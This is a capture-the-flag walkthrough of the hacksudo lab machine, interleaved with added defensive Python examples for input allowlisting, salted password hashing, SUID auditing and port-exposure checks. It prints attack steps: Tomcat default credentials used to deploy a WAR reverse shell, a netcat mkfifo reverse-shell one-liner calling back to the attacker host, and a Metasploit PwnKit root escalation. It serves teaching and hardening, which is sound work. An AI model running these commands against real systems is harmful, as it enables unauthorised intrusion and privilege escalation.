First, arp-scan is used to scan the network and determine the target's IP address.
ARP-Scan
192.168.2.131 08:00:27:ea:4c:9f PCS Systemtechnik GmbH
Next, the /etc/hosts file is edited to map the hostname hacksudo1.vln to the IP address.
/etc/hosts
192.168.2.131 hacksudo1.vln
Nmap is used to scan the target system for open ports and services. The -Pn option skips host discovery in case ICMP is blocked.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 13:57 CEST
Nmap scan report for hacksudo1.vln (192.168.2.131)
Host is up (0.00017s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Hacksudo | shops
|_http-server-header: Apache/2.4.46 (Ubuntu)
2222/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3a:83:d2:9a:7c:65:ff:16:91:9b:ec:2b:93:74:90:e9 (RSA)
| 256 47:98:2c:ba:49:b3:0f:3b:35:b3:22:c6:21:9c:bf:c9 (ECDSA)
|_ 256 a1:96:b1:98:65:fb:1f:f8:b5:57:d1:2a:30:b3:12:b1 (ED25519)
8080/tcp open http Apache Tomcat 9.0.24
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
MAC Address: 08:00:27:EA:4C:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 2.6.32 (91%), Linux 3.10 - 4.11
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms hacksudo1.vln (192.168.2.131)
Nikto is used to scan the web server for vulnerabilities and misconfigurations.
- Nikto v2.5.0
+ Target IP: 192.168.2.131
+ Target Hostname: 192.168.2.131
+ Target Port: 80
+ Start Time: 2024-09-19 14:00:25 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /scripts/: Directory indexing found.
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php: This might be interesting.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /html/: This might be interesting.
+ /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /README.md: Readme Found.
+ 8910 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-09-19 14:01:03 (GMT2) (38 seconds)
+ 1 host(s) tested
Gobuster is used to discover further directories and files.
http://192.168.2.131/index.php (Status: 200) [Size: 2550]
http://192.168.2.131/search.php (Status: 200) [Size: 5296]
http://192.168.2.131/products.sql (Status: 200) [Size: 6681]
http://192.168.2.131/info.txt (Status: 200) [Size: 162]
http://192.168.2.131/html (Status: 301) [Size: 313] [--> http://192.168.2.131/html/]
http://192.168.2.131/users.sql (Status: 200) [Size: 1671]
http://192.168.2.131/signup.php (Status: 200) [Size: 696]
http://192.168.2.131/admin.php (Status: 200) [Size: 1925]
http://192.168.2.131/scripts (Status: 301) [Size: 316] [--> http://192.168.2.131/scripts/]
http://192.168.2.131/cart.html (Status: 200) [Size: 2344]
http://192.168.2.131/add.php (Status: 200) [Size: 940]
http://192.168.2.131/css (Status: 301) [Size: 312] [--> http://192.168.2.131/css/]
http://192.168.2.131/log.php (Status: 200) [Size: 922]
http://192.168.2.131/hp.php (Status: 200) [Size: 9676]
http://192.168.2.131/query.txt (Status: 200) [Size: 185]
http://192.168.2.131/pro.php (Status: 200) [Size: 914]
http://192.168.2.131/config.php (Status: 200) [Size: 592]
http://192.168.2.131/res (Status: 301) [Size: 312] [--> http://192.168.2.131/res/]
http://192.168.2.131/LICENSE (Status: 200) [Size: 1071]
http://192.168.2.131/delete.php (Status: 200) [Size: 519]
http://192.168.2.131/inventory.php (Status: 200) [Size: 2808]
http://192.168.2.131/hg.php (Status: 200) [Size: 9672]
http://192.168.2.131/view_cart.php (Status: 200) [Size: 3039]
http://192.168.2.131/level1.sh (Status: 200) [Size: 185]
http://192.168.2.131/fandom.php (Status: 200) [Size: 1464]
http://192.168.2.131/got.php (Status: 200) [Size: 9696]
http://192.168.2.131/add_product.php (Status: 200) [Size: 3243]
http://192.168.2.131/flag1.txt (Status: 200) [Size: 12]
Progress: 13677696 / 13677758 (100.00%)
Reviewing the source of index.php reveals a file inclusion vulnerability: the file parameter from the query string is passed to include() without any validation.
view-source:http://192.168.2.131/index.php
$file = $_GET['file'];   // taken straight from the query string, no validation
if(isset($file))
{
include("$file");        // vulnerable: any path the client supplies is included
}
else
{
include("index.php");
}
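For comparison, the following is an added example (not code from the walkthrough or from the hacksudo application) showing the pattern that closes this class of bug: an allowlist of page names plus a containment check on the resolved path. It is written in Python rather than PHP so that it runs stand-alone; BASE_DIR and ALLOWED_PAGES are assumptions, chosen to match the /var/www/html web root seen later in the walkthrough.

```python
import os
from pathlib import Path
from typing import Optional

# Assumed web root; the walkthrough shows the site living under /var/www/html.
BASE_DIR = Path(os.path.realpath("/var/www/html"))

# Constructed allowlist: the bare page names the front controller may include.
ALLOWED_PAGES = frozenset({"index", "search", "products", "cart", "inventory"})


def resolve_page(param: Optional[str],
                 allowed=ALLOWED_PAGES,
                 base: Path = BASE_DIR) -> Optional[Path]:
    """Map the ?file= parameter to a file to include, or None if rejected.

    The original index.php hands $_GET['file'] straight to include(). This
    version accepts only bare names from an allowlist and then verifies that
    the resolved path is still inside the web root.
    """
    if not param:                       # missing or empty: same default as the original
        return base / "index.php"
    if param not in allowed:            # rejects '..', absolute paths, extensions, wrappers
        return None
    candidate = Path(os.path.realpath(base / f"{param}.php"))
    try:                                # defence in depth: realpath must stay under base
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


def audit_requests(values) -> dict:
    """Summarise which requested file= values would be served and which refused."""
    served = [v for v in values if resolve_page(v) is not None]
    refused = [v for v in values if resolve_page(v) is None]
    return {"served": served, "refused": refused}


if __name__ == "__main__":
    # Constructed sample of parameter values as they might appear in an access log.
    sample = ["search", "cart", "index.php", "../../etc/passwd", "/etc/passwd", ""]
    print(audit_requests(sample))
```

The allowlist alone is sufficient; the relative_to() check is kept so that a later change to the allowlist (for example adding names with subdirectories) cannot silently reopen the hole.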
Credentials were found on the Tomcat server on port 8080.
192.168.2.131:8080/host-manager
-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Oct 18, 2016 at 06:22 PM
-- Server version: 10.1.16-MariaDB
-- PHP Version: 5.6.24
...
..
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `fname`, `lname`, `phone`, `email`, `password`) VALUES
(16, 'Jimit', 'Dholakia', 12345678, 'jimit@example.com', 'b15fbfaac3776e5a2ad330fbf7976da7'),
(17, 'Admin', 'Admin', 12345, 'admin@example.com', '21232f297a57a5a743894a0e4a801fc3');
The password hashes were looked up and cracked with CrackStation.
https://crackstation.net/
Hash                              Type  Result  User
21232f297a57a5a743894a0e4a801fc3  md5   admin   'Admin', 'Admin', 12345, 'admin@example.com'
b15fbfaac3776e5a2ad330fbf7976da7  md5   100596  'Jimit', 'Dholakia', 12345678, 'jimit@example.com'
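The hashes fell instantly because the table stores one unsalted MD5 per password, so the same password always produces the same stored value and a precomputed lookup table resolves it. The following added example (not code from the walkthrough or the application) reproduces the dumped admin hash from the page and contrasts it with salted, iterated PBKDF2-HMAC storage; the record format and the iteration count are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os

# Hash taken from the users.sql dump above (the 'Admin' row).
DUMPED_ADMIN_HASH = "21232f297a57a5a743894a0e4a801fc3"


def legacy_md5(password: str) -> str:
    """How the dumped table stored passwords: one unsalted MD5 per password."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; returns a self-describing record.

    Record layout (assumed for this example): algo$iterations$salt_hex$digest_hex
    """
    if salt is None:
        salt = os.urandom(16)             # fresh random salt for every stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_same_hash(password: str, scheme) -> bool:
    """True if storing the same password twice yields the same stored value.

    That property is exactly what a precomputed lookup table relies on; a
    per-user salt removes it.
    """
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    print("md5('admin') matches dump:", legacy_md5("admin") == DUMPED_ADMIN_HASH)
    print("md5 deterministic:", same_password_same_hash("admin", legacy_md5))
    print("pbkdf2 deterministic:", same_password_same_hash("admin", hash_password))
```

In PHP the equivalent is password_hash() and password_verify(), which handle the salt and the record format themselves.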
An attempt was made to upload a WAR file through the manager application in order to obtain a reverse shell.
http://192.168.2.131:8080/manager/html
tomcat:tomcat
Select WAR file: benhack.war
/benhack
A reverse shell was obtained.
revshell: http://192.168.2.131:8080/benhack/
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.131] 41272
tomcat@hacksudo:/$ stty rows 48 columns 94
tomcat@hacksudo:/$ id
uid=1003(tomcat) gid=1003(tomcat) groups=1003(tomcat)
tomcat@hacksudo:/$
The system was searched for SUID files.
tomcat@hacksudo:/$ find / -type f -perm -4000 -ls 2>/dev/null
1186729 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
1184406 132 -rwsr-xr-x 1 root root 133960 Nov 19 2020 /usr/lib/snapd/snap-confine
1182400 52 -rwsr-xr-- 1 root messagebus 51496 Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1182612 468 -rwsr-xr-x 1 root root 477672 Jun 7 2020 /usr/lib/openssh/ssh-keysign
1181594 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
1181588 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
1181717 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
1182123 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
1181850 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1199340 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
1181699 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
1182193 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
1181918 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
1181864 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
1181897 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
1181482 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
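Every entry in this listing is a distribution-standard SUID binary, which is the situation a defender wants to be able to confirm quickly. The following added example (not part of the walkthrough) parses `find -ls` output of the kind shown above, compares it against a baseline of expected SUID paths, and flags anything unexpected or anything living under a directory that should never hold SUID binaries. The baseline is built from the page's own listing; the extra line appended at the end is constructed to show what a finding looks like.

```python
from typing import Dict, List

# Lines reproduced from the walkthrough's find output on the target.
TARGET_FIND_OUTPUT = """\
1186729 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
1184406 132 -rwsr-xr-x 1 root root 133960 Nov 19 2020 /usr/lib/snapd/snap-confine
1182400 52 -rwsr-xr-- 1 root messagebus 51496 Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1182612 468 -rwsr-xr-x 1 root root 477672 Jun 7 2020 /usr/lib/openssh/ssh-keysign
1181594 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
1182123 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
1199340 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
1181918 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
1181897 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
1181482 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
"""

# Constructed line (not from the target): a root-owned SUID file under the web root.
CONSTRUCTED_EXTRA = "9999991 8 -rwsr-xr-x 1 root root 8192 Sep 19 2024 /var/www/html/scripts/helper\n"

# Baseline: SUID paths expected on this Ubuntu build, taken from the page's listing.
BASELINE = frozenset(line.split(maxsplit=10)[10] for line in TARGET_FIND_OUTPUT.splitlines())

# Directories in which a SUID binary is never legitimate.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/var/www/")


def parse_find_ls(text: str) -> List[Dict[str, str]]:
    """Parse `find -ls` lines into dicts; the path is the 11th whitespace field."""
    entries = []
    for line in text.splitlines():
        parts = line.split(maxsplit=10)
        if len(parts) < 11:
            continue                      # blank or truncated line
        entries.append({"mode": parts[2], "owner": parts[4],
                        "group": parts[5], "path": parts[10]})
    return entries


def audit_suid(entries: List[Dict[str, str]], baseline=BASELINE) -> List[Dict[str, str]]:
    """Return one finding per entry that is not in the baseline or sits in an untrusted path."""
    findings = []
    for e in entries:
        reasons = []
        if e["path"] not in baseline:
            reasons.append("not in baseline")
        if e["path"].startswith(UNTRUSTED_PREFIXES):
            reasons.append("SUID file under untrusted directory")
        if e["mode"][6] == "s":
            reasons.append("also SGID")    # informational, e.g. /usr/bin/at
        if reasons and reasons != ["also SGID"]:
            findings.append({"path": e["path"], "owner": e["owner"],
                             "reason": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    print("baseline only:", audit_suid(parse_find_ls(TARGET_FIND_OUTPUT)))
    print("with constructed extra:",
          audit_suid(parse_find_ls(TARGET_FIND_OUTPUT + CONSTRUCTED_EXTRA)))
```

Baselines should come from a known-good image of the same release, not from the host under review; the listing above only serves as one because every entry on it is stock Ubuntu. Note that a binary can be on the baseline and still be the problem, as pkexec is on this machine: baseline checks catch additions, version checks catch the rest.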
A backup file was found in /var/www.
tomcat@hacksudo:/$ cat /var/www/backup
recover your access,from *
The contents of the /home directory are listed.
tomcat@hacksudo:/$ ls /home/
hacksudo vishal
The database credentials were found in config.php: the root account with an empty password.
tomcat@hacksudo:/$ cat /var/www/html/config.php
$currency = '₹ '; //Currency Character or code
$db_username = 'root';
$db_password = '';
$db_name = 'hacksudo';
$db_host = 'localhost';
Listening sockets and the processes behind them are listed with ss.
tomcat@hacksudo:/$ ss -altpn
State  Recv-Q  Send-Q  Local Address:Port        Peer Address:Port  Process
LISTEN 0       4096    127.0.0.53%lo:53          0.0.0.0:*
LISTEN 0       70      127.0.0.1:33060           0.0.0.0:*
LISTEN 0       151     127.0.0.1:3306            0.0.0.0:*
LISTEN 0       128     0.0.0.0:2222              0.0.0.0:*
LISTEN 0       1       [::ffff:127.0.0.1]:8005   *:*                users:(("java",pid=843,fd=65))
LISTEN 0       100     *:8009                    *:*                users:(("java",pid=843,fd=50))
LISTEN 0       128     [::]:2222                 [::]:*
LISTEN 0       100     *:8080                    *:*                users:(("java",pid=843,fd=44))
LISTEN 0       511     *:80                      *:*
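The listing makes the exposure visible: MySQL (3306/33060) and the Tomcat shutdown port (8005) are bound to loopback only, while the Tomcat HTTP connector (8080, where the manager application accepted default credentials), the AJP connector (8009), SSH (2222) and Apache (80) listen on all interfaces. The following added example (not part of the walkthrough) parses ss output of this shape and reports which ports are reachable from the network; the input is the listing above, with the IPv6 brackets restored.

```python
import re
from typing import Dict, List, Set

# The ss -altpn output from the target, reproduced from the walkthrough.
SS_OUTPUT = """\
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 0.0.0.0:2222 0.0.0.0:*
LISTEN 0 1 [::ffff:127.0.0.1]:8005 *:* users:(("java",pid=843,fd=65))
LISTEN 0 100 *:8009 *:* users:(("java",pid=843,fd=50))
LISTEN 0 128 [::]:2222 [::]:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=843,fd=44))
LISTEN 0 511 *:80 *:*
"""

PROCESS_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def classify_host(host: str) -> str:
    """Classify a local address as loopback, all (every interface) or specific."""
    host = host.split("%", 1)[0].strip("[]")     # drop '%lo' scope and IPv6 brackets
    if host in ("0.0.0.0", "*", "::"):
        return "all"
    if host == "::1" or host.startswith(("127.", "::ffff:127.")):
        return "loopback"
    return "specific"


def parse_ss(text: str) -> List[Dict[str, object]]:
    """Parse LISTEN lines of `ss -altpn` into dicts with port, scope and process."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        host, port = parts[3].rsplit(":", 1)
        m = PROCESS_RE.search(line)
        sockets.append({"port": int(port), "scope": classify_host(host),
                        "process": m.group(1) if m else None,
                        "pid": int(m.group(2)) if m else None})
    return sockets


def ports_by_scope(text: str, scope: str) -> Set[int]:
    """Set of ports whose listener has the given scope ('all', 'loopback', 'specific')."""
    return {s["port"] for s in parse_ss(text) if s["scope"] == scope}


def exposed_report(text: str) -> List[str]:
    """Human-readable lines for every listener reachable from the network."""
    return [f"port {s['port']} listens on all interfaces"
            + (f" (pid {s['pid']}, {s['process']})" if s["process"] else "")
            for s in parse_ss(text) if s["scope"] == "all"]


if __name__ == "__main__":
    for line in exposed_report(SS_OUTPUT):
        print(line)
    print("loopback only:", sorted(ports_by_scope(SS_OUTPUT, "loopback")))
```

For Tomcat the relevant hardening follows directly from the report: bind the AJP connector to 127.0.0.1 or disable it if no reverse proxy uses it, and restrict the manager and host-manager applications to trusted addresses rather than leaving them on the network with a reusable password.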
Credentials were found in the Tomcat configuration.
tomcat@hacksudo/conf$ cat tomcat-users.xml-->
Metasploit is used to escalate privileges.
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > set lport 4444
[!] Unknown datastore option: lßport. Did you mean LPORT?
lßport => 4444
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
A plain shell is spawned from the Tomcat session and then upgraded to a Meterpreter session.
tomcat@hacksudo:/tmp$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.131:46990) at 2024-09-19 15:26:07 +0200
Shell Banner:
$
--
$ ^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set lport 5555
lport => 5555
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.199:5555
[*] Sending stage (1017704 bytes) to 192.168.2.131
[*] Meterpreter session 2 opened (192.168.2.199:5555 -> 192.168.2.131:41278) at 2024-09-19 15:27:21 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > search suggester
Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         shell sparc/bsd        Shell Banner: $ --      192.168.2.199:4444 -> 192.168.2.131:46990 (192.168.2.131)
  2         meterpreter x86/linux  tomcat @ 192.168.2.131  192.168.2.199:5555 -> 192.168.2.131:41278 (192.168.2.131)
[*] 192.168.2.131 - Collecting local exploits for x86/linux...
[*] 192.168.2.131 - 196 exploit checks are being tried...
[+] 192.168.2.131 - exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.2.131 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.8.0
[+] 192.168.2.131 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.2.131 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.9.1.pre.1ubuntu1.1 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 64 / 64
[*] 192.168.2.131 - Valid modules for session 2:
# Name Potentially Vulnerable? Check Result
- - --
1 exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe Yes The target appears to be vulnerable.
2 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
3 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.8.0
4 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable.
5 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
7 exploit/linux/local/sudoedit_bypass_priv_esc Yes The target appears to be vulnerable. Sudo 1.9.1.pre.1ubuntu1.1 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
The cve_2021_4034_pwnkit_lpe_pkexec exploit is used, since the suggester reported the target as confirmed vulnerable.
session => 2
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lport 4445
lport => 4445
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.199:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ekixginuiegs
[+] The target is vulnerable.
[*] Writing '/tmp/.owsfcq/yqhpehv/yqhpehv.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.owsfcq
[*] Sending stage (3045380 bytes) to 192.168.2.131
[+] Deleted /tmp/.owsfcq/yqhpehv/yqhpehv.so
[+] Deleted /tmp/.owsfcq/.amozxxix
[+] Deleted /tmp/.owsfcq
[*] Meterpreter session 3 opened (192.168.2.199:4445 -> 192.168.2.131:50072) at 2024-09-19 15:30:57 +0200
A root shell was obtained.
Process 4328 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1003(tomcat)
The root flag is displayed.
cd /root
ls
level4.sh
root.txt
snap
cat root.txt
53555e221628c30119f01dcaa3f711b9
The user flag is displayed.
cd /home/hacksudo
ls
get
getmanager
level3.sh
user.txt
cat user.txt
bb81133d9e5c204f15a466d357f3b519
Metasploit: the privilege escalation was successful.